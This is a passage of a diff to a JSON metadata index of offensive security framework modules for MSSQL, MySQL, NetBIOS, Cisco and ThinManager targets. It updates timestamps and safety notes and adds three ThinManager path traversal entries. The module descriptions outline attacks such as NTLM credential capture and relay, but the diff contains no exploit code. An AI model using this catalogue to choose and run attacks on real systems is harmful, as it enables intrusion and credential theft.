+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_exec": {
"name": "Microsoft SQL Server Command Execution",
"fullname": "auxiliary/admin/mssql/mssql_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -7762,7 +7863,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_exec",
@@ -7770,21 +7871,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_findandsampledata": {
"name": "Microsoft SQL Server Find and Sample Data",
"fullname": "auxiliary/admin/mssql/mssql_findandsampledata",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -7796,7 +7900,7 @@
"hdm ",
"todb "
],
- "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.",
+ "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.",
"references": [
"URL-http://www.netspi.com/blog/author/ssutherland/"
],
@@ -7818,7 +7922,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_findandsampledata",
@@ -7826,28 +7930,31 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_idf": {
"name": "Microsoft SQL Server Interesting Data Finder",
"fullname": "auxiliary/admin/mssql/mssql_idf",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Wood "
],
- "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).",
+ "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).",
"references": [
"URL-http://www.digininja.org/metasploit/mssql_idf.php"
],
@@ -7869,7 +7976,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_idf",
@@ -7877,28 +7984,31 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_ntlm_stealer": {
"name": "Microsoft SQL Server NTLM Stealer",
"fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.",
+ "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.",
"references": [
"URL-https://en.wikipedia.org/wiki/SMBRelay"
],
@@ -7920,7 +8030,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer",
@@ -7928,19 +8038,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": {
"name": "Microsoft SQL Server SQLi NTLM Stealer",
"fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -7948,7 +8061,7 @@
"nullbind ",
"Antti "
],
- "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.",
+ "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.",
"references": [
"URL-https://en.wikipedia.org/wiki/SMBRelay"
],
@@ -7971,7 +8084,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer_sqli",
@@ -7979,19 +8092,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_sql": {
"name": "Microsoft SQL Server Generic Query",
"fullname": "auxiliary/admin/mssql/mssql_sql",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8021,7 +8137,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql",
@@ -8029,31 +8145,32 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_sql_file": {
"name": "Microsoft SQL Server Generic Query from File",
"fullname": "auxiliary/admin/mssql/mssql_sql_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j0hn__f : "
],
- "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.",
- "references": [
-
- ],
+ "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 1433,
@@ -8072,7 +8189,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql_file",
@@ -8080,21 +8197,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mysql/mysql_enum": {
"name": "MySQL Enumeration Module",
"fullname": "auxiliary/admin/mysql/mysql_enum",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8108,14 +8228,10 @@
"platform": "",
"arch": "",
"rport": 3306,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-03-28 10:34:38 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_enum",
@@ -8123,21 +8239,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mysql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mysql/mysql_sql": {
"name": "MySQL SQL Generic Query",
"fullname": "auxiliary/admin/mysql/mysql_sql",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8145,20 +8264,14 @@
"Bernardo Damele A. G. "
],
"description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 3306,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-02-14 15:26:34 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_sql",
@@ -8166,21 +8279,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mysql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/natpmp/natpmp_map": {
"name": "NAT-PMP Port Mapper",
"fullname": "auxiliary/admin/natpmp/natpmp_map",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8188,40 +8304,29 @@
"Jon Hart "
],
"description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 5351,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
"is_install_path": true,
"ref_name": "admin/natpmp/natpmp_map",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/netbios/netbios_spoof": {
"name": "NetBIOS Response Brute Force Spoof (Direct)",
"fullname": "auxiliary/admin/netbios/netbios_spoof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8231,40 +8336,29 @@
"tombkeeper"
],
"description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 137,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb",
"is_install_path": true,
"ref_name": "admin/netbios/netbios_spoof",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/arista_config": {
"name": "Arista Configuration Importer",
"fullname": "auxiliary/admin/networking/arista_config",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8272,20 +8366,14 @@
"h00die"
],
"description": "This module imports an Arista device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-03 18:12:53 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/arista_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/arista_config",
@@ -8294,20 +8382,14 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "Reliability": [
-
+ "crash-safe"
],
- "SideEffects": [
-
- ]
+ "Reliability": [],
+ "SideEffects": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/brocade_config": {
"name": "Brocade Configuration Importer",
@@ -8322,20 +8404,14 @@
"h00die"
],
"description": "This module imports a Brocade device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-09-22 02:56:51 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/brocade_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/brocade_config",
@@ -8343,12 +8419,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/cisco_asa_extrabacon": {
"name": "Cisco ASA Authentication Bypass (EXTRABACON)",
@@ -8378,14 +8457,10 @@
"platform": "",
"arch": "",
"rport": 161,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-08-27 17:15:33 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb",
"is_install_path": true,
"ref_name": "admin/networking/cisco_asa_extrabacon",
@@ -8395,7 +8470,13 @@
"notes": {
"AKA": [
"EXTRABACON"
- ]
+ ],
+ "Stability": [],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -8423,20 +8504,14 @@
"h00die"
],
"description": "This module imports a Cisco IOS or NXOS device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-09-22 02:56:51 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/cisco_config",
@@ -8444,19 +8519,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/cisco_dcnm_auth_bypass": {
"name": "Cisco DCNM auth bypass",
"fullname": "auxiliary/admin/networking/cisco_dcnm_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-06-01",
"type": "auxiliary",
@@ -8509,9 +8585,7 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/cisco_dcnm_download": {
"name": "Cisco Data Center Network Manager Unauthenticated File Download",
@@ -8553,7 +8627,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-13 18:55:39 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb",
"is_install_path": true,
"ref_name": "admin/networking/cisco_dcnm_download",
@@ -8561,12 +8635,17 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/cisco_secure_acs_bypass": {
"name": "Cisco Secure ACS Unauthorized Password Change",
@@ -8605,7 +8684,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-07-16 05:43:52 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb",
"is_install_path": true,
"ref_name": "admin/networking/cisco_secure_acs_bypass",
@@ -8613,12 +8692,18 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": {
"name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",
@@ -8642,12 +8727,8 @@
"platform": "",
"arch": "",
"rport": 21,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2024-07-24 16:42:43 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
@@ -8660,9 +8741,7 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
@@ -8670,16 +8749,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/f5_config": {
"name": "F5 Configuration Importer",
"fullname": "auxiliary/admin/networking/f5_config",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8687,20 +8762,14 @@
"h00die"
],
"description": "This module imports an F5 device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-03 18:12:53 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/f5_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/f5_config",
@@ -8709,20 +8778,14 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "SideEffects": [
-
+ "crash-safe"
],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/juniper_config": {
"name": "Juniper Configuration Importer",
@@ -8737,20 +8800,14 @@
"h00die"
],
"description": "This module imports a Juniper ScreenOS or JunOS device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-03 18:12:53 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/juniper_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/juniper_config",
@@ -8759,14 +8816,10 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "SideEffects": [
-
+ "crash-safe"
],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -8784,9 +8837,7 @@
"auxiliary_admin/networking/mikrotik_config": {
"name": "Mikrotik Configuration Importer",
"fullname": "auxiliary/admin/networking/mikrotik_config",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8794,20 +8845,14 @@
"h00die"
],
"description": "This module imports a Mikrotik device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-03 18:12:53 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/mikrotik_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/mikrotik_config",
@@ -8816,14 +8861,10 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "SideEffects": [
-
+ "crash-safe"
],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -8838,6 +8879,137 @@
}
]
},
+ "auxiliary_admin/networking/thinmanager_traversal_delete": {
+ "name": "ThinManager Path Traversal (CVE-2023-2915) Arbitrary File Delete",
+ "fullname": "auxiliary/admin/networking/thinmanager_traversal_delete",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": "2023-08-17",
+ "type": "auxiliary",
+ "author": [
+ "Michael Heinzl",
+ "Tenable"
+ ],
+ "description": "This module exploits a path traversal vulnerability (CVE-2023-2915) in\n ThinManager <= v13.1.0 to delete arbitrary files from the system.\n The affected service listens by default on TCP port 2031 and runs in the\n context of NT AUTHORITY\\SYSTEM.",
+ "references": [
+ "CVE-2023-2915",
+ "URL-https://www.tenable.com/security/research/tra-2023-28",
+ "URL-https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": 2031,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-06-23 19:38:36 +0000",
+ "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_delete.rb",
+ "is_install_path": true,
+ "ref_name": "admin/networking/thinmanager_traversal_delete",
+ "check": true,
+ "post_auth": false,
+ "default_credential": false,
+ "notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "Reliability": [],
+ "SideEffects": [
+ "ioc-in-logs"
+ ]
+ },
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
+ },
+ "auxiliary_admin/networking/thinmanager_traversal_upload": {
+ "name": "ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload",
+ "fullname": "auxiliary/admin/networking/thinmanager_traversal_upload",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": "2023-04-05",
+ "type": "auxiliary",
+ "author": [
+ "Michael Heinzl",
+ "Tenable"
+ ],
+ "description": "This module exploits a path traversal vulnerability (CVE-2023-27855) in\n ThinManager <= v13.0.1 to upload arbitrary files to the target system.\n The affected service listens by default on TCP port 2031 and runs in the\n context of NT AUTHORITY\\SYSTEM.",
+ "references": [
+ "CVE-2023-27855",
+ "URL-https://www.tenable.com/security/research/tra-2023-13",
+ "URL-https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1138640"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": 2031,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-06-23 19:38:36 +0000",
+ "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_upload.rb",
+ "is_install_path": true,
+ "ref_name": "admin/networking/thinmanager_traversal_upload",
+ "check": true,
+ "post_auth": false,
+ "default_credential": false,
+ "notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "Reliability": [],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ]
+ },
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
+ },
+ "auxiliary_admin/networking/thinmanager_traversal_upload2": {
+ "name": "ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload",
+ "fullname": "auxiliary/admin/networking/thinmanager_traversal_upload2",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": "2023-08-17",
+ "type": "auxiliary",
+ "author": [
+ "Michael Heinzl",
+ "Tenable"
+ ],
+ "description": "This module exploits a path traversal vulnerability (CVE-2023-2917) in\n ThinManager <= v13.1.0 to upload arbitrary files to the target system.\n The affected service listens by default on TCP port 2031 and runs in the\n context of NT AUTHORITY\\SYSTEM.",
+ "references": [
+ "CVE-2023-2917",
+ "URL-https://www.tenable.com/security/research/tra-2023-28",
+ "URL-https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": 2031,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-06-23 19:38:36 +0000",
+ "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb",
+ "is_install_path": true,
+ "ref_name": "admin/networking/thinmanager_traversal_upload2",
+ "check": true,
+ "post_auth": false,
+ "default_credential": false,
+ "notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "Reliability": [],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ]
+ },
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
+ },
"auxiliary_admin/networking/ubiquiti_config": {
"name": "Ubiquiti Configuration Importer",
"fullname": "auxiliary/admin/networking/ubiquiti_config",
@@ -8851,18 +9023,12 @@
"h00die"
],
"description": "This module imports an Ubiquiti device configuration.\n The db file within the .unf backup is the data file for\n Unifi. This module can take either the db file or .unf.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2022-03-23 11:32:45 +0000",
"path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb",
@@ -8875,25 +9041,17 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
- "SideEffects": [
-
- ]
+ "Reliability": [],
+ "SideEffects": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/networking/vyos_config": {
"name": "VyOS Configuration Importer",
